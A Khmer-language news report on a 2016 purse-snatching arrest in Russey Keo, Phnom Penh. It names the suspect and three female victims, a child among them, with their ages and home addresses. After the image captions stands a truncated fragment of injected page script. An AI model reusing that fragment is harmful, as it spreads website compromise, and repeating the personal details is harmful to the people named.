Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ពូកែឆក់កាបូបតាមផ្លូវត្រូវនគរបាលប៉ុស្តិ៍ឬស្សីកែវឃាត់ខ្លួន

ភ្នំពេញ៖ ជនសង្ស័យម្នាក់ក្នុងចំនោមបក្សពួក២នាក់ ត្រូវបានកម្លាំងប៉ុស្តិ៍ឬស្សីកែវ និងប្រជាការពារ មានកម្លាំងល្បាតខណ្ឌតាមឃាត់ខ្លួនបានភ្លាមៗ ខណ:ដែលរូបគេបានធ្វើសកម្មភាពឆក់កាបូបដៃស្ត្រីម្នាក់ គ្រាដែលស្ត្រីនោះកំពុងជិះម៉ូតូគ្នាបីនាក់ទៅចូលរួមពិធីការសាច់ញាតិ បណ្តាលអោយរងរបួសរលាត់ដៃជើង ហើយជនសង្ស័យព្យាយាមគេចខ្លួន។ហេតុការណ៍នេះបានកើតឡើងកាលពីវេលាម៉ោង៦ល្ងាចនៅថ្ងៃទី២០ខែតុលា ឆ្នាំ២០១៦ នៅចំនុចផ្លូវជាតិលេខ៥ ក្រុមទី០១ ភូមិឃ្លាំងសាំង សង្កាត់ឬស្សីកែវ ខណ្ឌឬស្សី កែវ។

នាយប៉ុស្តិ៍នគរបាលឬស្សីកែវ លោកតូច គឹមសុង បានអោយដឹងថាជនសង្ស័យដែលកម្លាំងសមត្ថកិច្ចឃាត់បាននោះមានឈ្មោះទួន រតនះ ភេទប្រុស អាយុ៣៥ឆ្នាំ មានទីលំនៅផ្ទះលេខ២២៥៤ ផ្លូវ៩៣ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ មុខរបរមិនពិតប្រាកដ។ ចំនែកជនរងគ្រោះទី១ ឈ្មោះ នួន សេងយន់ ភេទស្រី អាយុ៦៨ឆ្នាំ ទី២ឈ្មោះ នួន ណារុន ភេទស្រី អាយុ៣២ឆ្នាំ និងទី៣ឈ្មោះខេមរា សុម៉ាវតី ភេទស្រី អាយុ៦ឆ្នាំ ទាំង៣នាក់មានទីលំនៅផ្ទះលេខ៩៩ ផ្លូវបេតុង ក្រុមទី៧ ភូមិមិត្តភាព
សង្កាត់ឬស្សីកែវ ខណ្ឌឬស្សីកែវ។

នាយនគរបាលប៉ុស្តិ៍ឬស្សីកែវរូបនេះ បានបន្តអោយដឹងទៀតថាមុនពេលកើតហេតុ ជនរងគ្រោះជិះម៉ូតូម៉ាក Fino ពាក់ស្លាកលេខភ្នំពេញ1BL-7941 គ្នាបីនាក់ទៅចូលរួមពិធីមង្គលការគេ ពេលមកដល់ចំនុចកើតហេតុខាងលើ ត្រូវជនសង្ស័យជិះម៉ូតូម៉ាកStep គ្នាពីរនាក់ធ្វើសកម្មភាពឆក់យកកាបូបយួរដៃពីជនរងគ្រោះបណ្តាលដួលរងរបួស ស្របពេលនោះសមត្ថកិច្ចខណ្ឌប៉ុស្តិ៍កំពុងចេញសកម្មភាពល្បាត បានធ្វើអន្តរាគមន៍ឃាត់បានជនសង្ស័យម្នាក់ រីឯគ្នាវាម្នាក់ទៀតបានបើកម៉ូតូរត់គេចបាត់។

បច្ចុប្បន្នជនសង្ស័យកំពុងស្ថិតក្រោមចំនាត់ការនគរបាលប៉ុស្តិ៍ឬស្សីកែវ ដើម្បីសាកសួរយកចំលើយ និងបន្តស្រាវជ្រាវចាប់បក្សពួកដែលនៅសេសសល់បញ្ជូនទៅសាលាដំបូងរាជធានីភ្នំពេញចាត់ការទៅតាមផ្លូវច្បាប់។

img-20161020-wa0223-1 img-20161020-wa0225 img-20161020-wa0224 img-20161020-wa0222 img-20161020-wa0221var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More